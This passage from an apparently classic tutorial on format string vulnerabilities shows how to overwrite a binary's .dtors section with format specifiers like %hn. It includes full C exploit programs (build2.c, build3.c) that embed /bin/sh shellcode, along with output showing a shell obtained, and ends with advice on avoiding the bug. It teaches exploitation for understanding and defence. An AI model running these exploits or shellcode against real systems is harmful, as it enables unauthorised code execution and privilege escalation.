In fact, the only interesting section is the destructor section (.dtors): we have no time to do anything before the constructor section (.ctors) is used. Usually, it is enough to overwrite the address placed 4 bytes after the start of the section (that is, right after the 0xffffffff).

Let's go back to our example. We replace the 0x00000000 in the .dtors section, located at 0x8049848=0x8049844+4, with the address of the accessForbidden() function, already known (0x8048664):

>./vuln `./build 0x8049848 0x8048664 3`
adr : 134518856 (8049848)
val : 134514276 (8048664)
valh: 2052 (0804)
vall: 34404 (8664)
[JH%.2044x%3$hn%.32352x%4$hn] (33)
argv2 = bffff694 (0xbffff51c)
helloWorld() = 0x8048648
accessForbidden() = 0x8048664

before : ptrf() = 0x8048648 (0xbffff434)
buffer = [JH0000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000
000] (127)
after : ptrf() = 0x8048648 (0xbffff434)
Welcome in "helloWorld"
You shouldn't be here "accesForbidden"
Segmentation fault (core dumped)

Everything runs fine: main() calls helloWorld() and then exits. The destructors are then called. The section .dtors now starts with the address of accessForbidden(), which is therefore executed. Then, since there is no other real function address, the expected core dump happens.

Please, give me a shell

We have seen simple exploits here. Using the same principle we can get a shell, either by passing the shellcode through argv[] or an environment variable to the vulnerable program. We just have to set the right address (i.e. the address of the eggshell) in the section .dtors.

Right now, we know:

However, in reality, the vulnerable program is not as nice as the one in the example. We will introduce a method that allows us to put a shellcode in memory and retrieve its exact address (this means: no more NOP at the beginning of the shellcode).

The idea is based on recursive calls of the function exec*():

/* argv.c */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>


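int main(int argc, char **argv) {

  char **env;
  char **arg;
  int nb, i;

  if (argc < 2)               /* the recursion depth is required */
    return EXIT_FAILURE;
  nb = atoi(argv[1]);

  env    = (char **) malloc(sizeof(char *));
  env[0] = 0;
  
  /* three slots: program name, counter, terminating NULL */
  arg    = (char **) malloc(sizeof(char *) * 3);
  arg[0] = argv[0];
  arg[1] = (char *) malloc(5);
  snprintf(arg[1], 5, "%d", nb-1);
  arg[2] = 0;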

  /* printings */
  printf("*** argv %d ***\n", nb);
  printf("argv = %p\n", argv);
  printf("arg = %p\n", arg);
  for (i = 0; i<argc; i++) {
    printf("argv[%d] = %p (%p)\n", i, argv[i], &argv[i]);
    printf("arg[%d] = %p (%p)\n", i, arg[i], &arg[i]);
  }
  printf("\n");

  /* recall */
  if (nb == 0) 
    exit(0);
  execve(argv[0], arg, env);
}
The input is an integer nb; the program recursively calls itself, so that it runs nb+1 times in total:
>>./argv 2
*** argv 2 ***
argv = 0xbffff6b4
arg = 0x8049828
argv[0] = 0xbffff80b (0xbffff6b4)
arg[0] = 0xbffff80b (0x8049828)
argv[1] = 0xbffff812 (0xbffff6b8)
arg[1] = 0x8049838 (0x804982c)

*** argv 1 ***
argv = 0xbfffff44
arg = 0x8049828
argv[0] = 0xbfffffec (0xbfffff44)
arg[0] = 0xbfffffec (0x8049828)
argv[1] = 0xbffffff3 (0xbfffff48)
arg[1] = 0x8049838 (0x804982c)

*** argv 0 ***
argv = 0xbfffff44
arg = 0x8049828
argv[0] = 0xbfffffec (0xbfffff44)
arg[0] = 0xbfffffec (0x8049828)
argv[1] = 0xbffffff3 (0xbfffff48)
arg[1] = 0x8049838 (0x804982c)

We immediately notice that the addresses allocated for arg and argv no longer move after the second call. We are going to use this property in our exploit. We just have to change our build program slightly so that it calls itself before calling vuln. This way, we get the exact address of argv, and that of our shellcode:

/* build2.c */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

char* build(unsigned int addr, unsigned int value, unsigned int where)
{
  //Same function as in build.c
}

int
main(int argc, char **argv) {
  
  char *buf;
  char shellcode[] =
     "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
     "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
     "\x80\xe8\xdc\xff\xff\xff/bin/sh";

  if(argc < 3)
    return EXIT_FAILURE;

  if (argc == 3) {

    fprintf(stderr, "Calling %s ...\n", argv[0]);
    buf = build(strtoul(argv[1], NULL, 16),  /* address */
        (unsigned int) shellcode,
        atoi(argv[2]));              /* offset */
    
    fprintf(stderr, "[%s] (%d)\n", buf, (int) strlen(buf));
    execlp(argv[0], argv[0], buf, shellcode, argv[1], argv[2], NULL);

  } else {

    fprintf(stderr, "Calling ./vuln ...\n");
    fprintf(stderr, "sc = %p\n", argv[2]);
    buf = build(strtoul(argv[3], NULL, 16),  /* address */
        (unsigned int) argv[2],
        atoi(argv[4]));              /* offset */
    
    fprintf(stderr, "[%s] (%d)\n", buf, (int) strlen(buf));

    execlp("./vuln","./vuln", buf, argv[2], argv[3], argv[4], NULL);
  }

  return EXIT_SUCCESS;
}

The trick is that we know what to call according to the number of arguments the program received. To start our exploit, we just give build2 the address we want to write to and the offset. We no longer have to give the value, since it is computed during the successive calls.

To succeed, we need to keep the same memory layout between the different calls of build2 and then vuln (that is why the first call also runs the build() function: both calls then have the same memory footprint):

>>./build2 0xbffff634 3
Calling ./build2 ...
adr : -1073744332 (bffff634)
val : -1073744172 (bffff6d4)
valh: 49151 (bfff)
vall: 63188 (f6d4)
[6öÿ¿4öÿ¿%.49143x%3$hn%.14037x%4$hn] (34)
Calling ./vuln ...
sc = 0xbffff88f
adr : -1073744332 (bffff634)
val : -1073743729 (bffff88f)
valh: 49151 (bfff)
vall: 63631 (f88f)
[6öÿ¿4öÿ¿%.49143x%3$hn%.14480x%4$hn] (34)
0 0xbffff867
1 0xbffff86e
2 0xbffff891
3 0xbffff8bf
4 0xbffff8ca
helloWorld() = 0x80486c4
accessForbidden() = 0x80486e8

before : ptrf() = 0x80486c4 (0xbffff634)
buffer = [6öÿ¿4öÿ¿000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000
00000000000] (127)
after : ptrf() = 0xbffff88f (0xbffff634)
Segmentation fault (core dumped)

Why didn't this work? We said we had to build an exact copy of the memory between the 2 calls ... and we didn't do it! argv[0] (the name of the program) changed. Our program is first named build2 (6 bytes) and then vuln (4 bytes). That is a difference of 2 bytes, which is exactly the shift you can see in the example above: the address of the shellcode during the second call of build2 is given by sc = 0xbffff88f, but argv[2] in vuln is located at 0xbffff891 (the line "2 0xbffff891"). To solve this, it is enough to rename build2 to a name of only 4 letters, e.g. bui2:

>>cp build2 bui2
>>./bui2 0xbffff634 3
Calling ./bui2 ...
adr : -1073744332 (bffff634)
val : -1073744156 (bffff6e4)
valh: 49151 (bfff)
vall: 63204 (f6e4)
[6öÿ¿4öÿ¿%.49143x%3$hn%.14053x%4$hn] (34)
Calling ./vuln ...
sc = 0xbffff891
adr : -1073744332 (bffff634)
val : -1073743727 (bffff891)
valh: 49151 (bfff)
vall: 63633 (f891)
[6öÿ¿4öÿ¿%.49143x%3$hn%.14482x%4$hn] (34)
0 0xbffff867
1 0xbffff86e
2 0xbffff891
3 0xbffff8bf
4 0xbffff8ca
helloWorld() = 0x80486c4
accessForbidden() = 0x80486e8

before : ptrf() = 0x80486c4 (0xbffff634)
buffer = [6öÿ¿4öÿ¿0000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000
000000000000000] (127)
after : ptrf() = 0xbffff891 (0xbffff634)
bash$ 

Won again: it works much better that way ;-) The eggshell is in the stack, and we changed the address pointed to by ptrf so that it points to our shellcode. Of course, this can only work if the stack is executable.

But we have seen that format strings allow us to write anywhere : let's add a destructor to our program in the section .dtors:

>>objdump -s -j .dtors vuln

vuln:     file format elf32-i386

Contents of section .dtors:
80498c0 ffffffff 00000000                    ........        
>>./bui2 80498c4 3
Calling ./bui2 ...
adr : 134518980 (80498c4)
val : -1073744156 (bffff6e4)
valh: 49151 (bfff)
vall: 63204 (f6e4)
[ÆÄ%.49143x%3$hn%.14053x%4$hn] (34)
Calling ./vuln ...
sc = 0xbffff894
adr : 134518980 (80498c4)
val : -1073743724 (bffff894)
valh: 49151 (bfff)
vall: 63636 (f894)
[ÆÄ%.49143x%3$hn%.14485x%4$hn] (34)
0 0xbffff86a
1 0xbffff871
2 0xbffff894
3 0xbffff8c2
4 0xbffff8ca
helloWorld() = 0x80486c4
accessForbidden() = 0x80486e8

before : ptrf() = 0x80486c4 (0xbffff634)
buffer = [ÆÄ000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000
0000000000000000] (127)
after : ptrf() = 0x80486c4 (0xbffff634)
Welcome in "helloWorld"
bash$ exit
exit
>>

Here, no core dump is created when our destructor finishes. This is because our shellcode contains an exit(0) call.

To conclude, as a last gift, here is build3.c, which also gives a shell, but with the shellcode passed through an environment variable:

/* build3.c */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

extern char **environ;  /* process environment, used in main() */

char* build(unsigned int addr, unsigned int value, unsigned int where)
{
  //Same function as in build.c
}

int main(int argc, char **argv) {
  char **env;
  char **arg;
  unsigned char *buf;
  unsigned char shellcode[] =
     "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
      "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
       "\x80\xe8\xdc\xff\xff\xff/bin/sh";

  if (argc == 3) {

    fprintf(stderr, "Calling %s ...\n", argv[0]);
    buf = build(strtoul(argv[1], NULL, 16),  /* address */
        (unsigned int) shellcode,
        atoi(argv[2]));              /* offset */
    
    fprintf(stderr, "%d\n", strlen(buf));
    fprintf(stderr, "[%s] (%d)\n", buf, strlen(buf));
    printf("%s",  buf);
    arg = (char **) malloc(sizeof(char *) * 3);
    arg[0]=argv[0];
    arg[1]=buf;
    arg[2]=NULL;
    env = (char **) malloc(sizeof(char *) * 4);
    env[0]=&shellcode;
    env[1]=argv[1];
    env[2]=argv[2];
    env[3]=NULL;
    execve(argv[0],arg,env);
  } else 
  if(argc==2) {

    fprintf(stderr, "Calling ./vuln ...\n");
    fprintf(stderr, "sc = %p\n", environ[0]);
    buf = build(strtoul(environ[1], NULL, 16),  /* address */
        (unsigned int) environ[0],
        atoi(environ[2]));              /* offset */
    
    fprintf(stderr, "%d\n", strlen(buf));
    fprintf(stderr, "[%s] (%d)\n", buf, strlen(buf));
    printf("%s",  buf);
    arg = (char **) malloc(sizeof(char *) * 3);
    arg[0]=argv[0];
    arg[1]=buf;
    arg[2]=NULL;
    execve("./vuln",arg,environ);
  }
    
  return 0;
}

Once again, since this environment is in the stack, we need to take care not to modify the memory layout (i.e. not to change the position of the variables and arguments). The binary's name must contain the same number of characters as the name of the vulnerable program, vuln.

Here, we choose to use the global variable extern char **environ to set the values we need:

  1. environ[0]: contains shellcode;
  2. environ[1]: contains the address where we expect to write;
  3. environ[2]: contains the offset.
We leave you to play with it ... this (too) long article is already filled with too much source code and too many test programs.

Conclusion : how to avoid format bugs ?

As shown in this article, the main trouble with this bug comes from the freedom left to a user to build his own format string. The solution to avoid such a flaw is very simple: never let a user provide his own format string! Most of the time, this simply means inserting a "%s" format when functions such as printf(), syslog(), ... are called. If you really can't avoid it, then you have to check the input given by the user very carefully.

Acknowledgments

The authors thank Pascal Kalou Bouchareine for his patience (he had to find out why our exploit with the shellcode in the stack did not work ... when this same stack was not executable), his ideas (and more particularly the exec*() trick), his encouragement ... but also for his article on format bugs which caused, in addition to our interest in the question, intense cerebral agitation ;-)

Footnotes

... commands1
the word command here means everything that affects the format of the string: the width, the precision, ...
... bytes2
the -1 comes from the last character reserved for the '\0'.